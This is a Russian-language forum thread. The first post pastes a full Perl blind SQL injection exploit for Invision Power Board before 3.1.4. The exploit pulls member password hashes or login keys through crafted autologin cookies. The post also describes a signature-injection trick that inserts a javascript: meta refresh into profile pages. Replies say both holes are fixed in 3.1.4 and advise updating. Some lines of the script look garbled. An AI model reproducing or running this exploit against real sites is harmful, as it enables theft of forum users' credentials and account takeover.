Перейти к контенту
  • 0

Exploit Hack Forum IPB 3.1.4 CP n Perl


Вопрос

Exploit Hack Forum IPB 3.1.4 CP n Perl

 

 

SQL Injection Exploit

 

<pre class="prettyprint">#!/usr/bin/perl## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX## vulnerable forum versions : 1.* , 2.* ,3.*(<3.1.4)## tested on version 1 Final and version 3.1.4## * work on all mysql versions## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)## ©oded by 1dt.w0lf## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~~## screen:## ~~~~~~~## r57ipb3.pl blah.com /ipb13/ 1 0## [~] SERVER : blah.com## [~] PATH : /ipb13/## [~] MEMBER ID : 1## [~] TARGET : 0 - IPB 1.*## [~] SEARCHING PASSWORD ... [ DONE ]#### MEMBER ID : 1## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99#### r57ipb3.pl blah.com /ipb314/ 1 1## [~] SERVER : blah.com## [~] PATH : /ipb314/## [~] MEMBER ID : 1## [~] TARGET : 1 - IPB 2.*## [~] SEARCHING PASSWORD ... [ DONE ]#### MEMBER ID : 1## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d#### r57ipb3.pl blah.com /ipb314/ 1 1## [~] SERVER : blah.com## [~] PATH : /ipb314/## [~] MEMBER ID : 1## [~] TARGET : 1 - IPB 3.*## [~] SEARCHING PASSWORD ... [ DONE ]#### MEMBER ID : 1## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~~## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~~## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  ~~~~~~~~~~~~~~~~~~~~~~use IO::Socket;if (@ARGV < 4) { &usage; }$server = $ARGV[0];$path = $ARGV[1];$member_id = $ARGV[2];$target = $ARGV[3];$pass = ($target)?('member_login_key'):('password');$server =~ s!(http://)!!;$request = 'http://';$request .= $server;$request .= $path;$s_num = 1;$|++;$n = 0;print "[~] SERVER : $server\r\n";print "[~] PATH : $path\r\n";print "[~] MEMBER ID : $member_id\r\n";print "[~] TARGET : $target";print (($target)?(' - IPB 3.*'):(' - IPB 2.*'):(' - IPB 1.*'));print "\r\n";print "[~] SEARCHING PASSWORD ... [|]";($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;while(1){if(&found(47,58)==0) { &found(96,122); }$char = $i;if ($char=="0"){if(length($allchar) > 0){print qq{bb DONE ]MEMBER ID : $member_id};print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));print $allchar."\r\n";}else{print "\b\b FAILED ]";}exit();}else{$allchar .= chr(42);}$s_num++;}sub found($$){my $fmin = $_[0];my $fmax = $_[1];if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }$r = int($fmax - ($fmax-$fmin)/2);$check = " BETWEEN $r AND $fmax";if ( &check($check) ) { &found($r,$fmax); }else { &found($fmin,$r); }}sub crack($$){my $cmin = $_[0];my $cmax = $_[1];$i = $cmin;while ($i<$cmax){$crcheck = "=$i";if ( &check($crcheck) ) { return $i; }$i++;}$i = 0;return $i;}sub check($){$n++;status();$ccheck = $_[0];$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%7  2%69%6E%67%28";$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;$nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%2  1%20";$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",$path,$server,$cmember_id,$pass_hash1,$cmember_id,  $pass_hash2,$pass_hash3,$nmalykh);while(<$socket>){if (/Set-Cookie: session_id=0;/) { return 1; }}return 0;}sub status(){$status = $n % 5;if($status==0){ print "\b\b/]"; }if($status==1){ print "\b\b-]"; }if($status==2){ print "\b\b\\]"; }if($status==3){ print "\b\b|]"; }}sub usage(){print q(Invision Power Board v < 3.1.4 SQL injection exploit----------------------------------------------------USAGE:~~~~~~r57ipb3.pl [server] [/folder/] [member_id] [target][server] - host where IPB installed[/folder/] - folder where IPB installed[member_id] - user id for brutetargets:0 - IPB 1.*1 - IPB 2.*2 - IPB 3.* (Prior To 3.1.4)e.g. r57ipb3.pl 127.0.0.1 /IPB/ 1 1----------------------------------------------------©oded by 1dt.w0lfRST/GHC , [url="http://rst.void.ru/"]http://rst.void.ru[/url] , [url="http://ghc.ru/"]http://ghc.ru[/url]);exit();}  

AUTHOR: RTC-GNC-XxxEmchExxX Для удобство измените 72 строку на

print $target(' - IPB 3.*');  

А также Регистрируем акк состоящий из нулей, например "00000" Дальше идем в профиль, вставляем в подпись Цитата:</pre>

Цитата

 

;url=javascript:alert('Fuck off');" HTTP-EQUIV="refresh

 

На странице со своим профилем получаем код:

Цитата


<meta name="description" content="00000: ;url=javascript:alert('Fuck off');" HTTP-EQUIV="refresh" />

 

Проверял, на опере алерт вылетает, на хроме нет.

 

[offtop]Да.. активность в разделе, как никогда раньше)[/offtop]

Проверил, баг присутствует во всех 3 версиях вплоть до последней 3.1.4.

 

_http://forum.antichat.ru/threadnav89112-5-10.html

Взял отсюда.

Подскажите как пофиксить или на темку киньте ссылку -)<pre class="prettyprint"></pre>

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0

Здравствуйте.

 

Первая указанная ошибка исправлена в IPB 3.1.4, то есть на ней они уже не работают.

Вторая ошибка не работает при любых проверках в IPB 3.1.4 и выше.

 

Держите версии продуктов актуальными и у вас не будет проблем.

Изменено пользователем Vitaly
есть отчет по второй ошибке
Ссылка на комментарий
Поделиться на других сайтах

  • 0

У меня второе на 3.0.5 не работает.

 

А первое что такое? Подбор брутфорсом или что? Каким образом было исправлено в 3.1.4? Где-то выкладывался отдельно фикс?

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.